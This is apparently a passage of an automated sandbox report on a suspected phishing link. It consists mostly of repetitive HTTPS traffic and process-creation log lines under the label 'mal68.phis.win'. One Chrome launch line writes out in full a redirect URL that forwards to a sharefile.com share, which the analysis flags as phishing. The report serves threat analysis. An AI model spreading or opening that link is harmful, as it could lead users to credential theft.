      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
      Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
      Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
      Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
      Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
      Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
      Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
      Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
      Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
      Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
      Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
      Source: unknownHTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.16:49730 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.16:49746 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49747 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49949 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.16:49951 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 4.231.128.59:443 -> 192.168.2.16:49953 version: TLS 1.2
      Source: classification engineClassification label: mal68.phis.win@20/29@84/236
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://t1.a.editions-legislatives.fr/r/?id=hfe20c57e,3602a3f1,7f94ba88&p1=papsolutionsptyltd.sharefile.com/public/share/web-scf26ff3a4b6d4c1db1815de3794eb6be
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1932,i,7627632924546915313,1275386535466264865,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1932,i,7627632924546915313,1275386535466264865,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: unknownProcess created: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exe "C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exe" -ServerName:microsoft.windowslive.mail.AppXfbjsbkxvprcgqg6q4c9jfr0pn3kv9x5s.mca
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: apphelp.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: microsoft.applications.telemetry.windows.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: msoimm.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: mso40uiimm.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: mso30imm.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: mso20imm.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: office.ui.xaml.core.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: office.ui.xaml.word.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: vccorlib140_app.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: vcruntime140_app.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: msvcp140_app.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: vccorlib140_app.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: msvcp140_app.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: vcruntime140_app.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: vcruntime140_app.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: msvcp140_app.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: vccorlib140_app.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: vcruntime140_app.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: msvcp140_app.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: mso98imm.dll
      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: mso50imm.dll
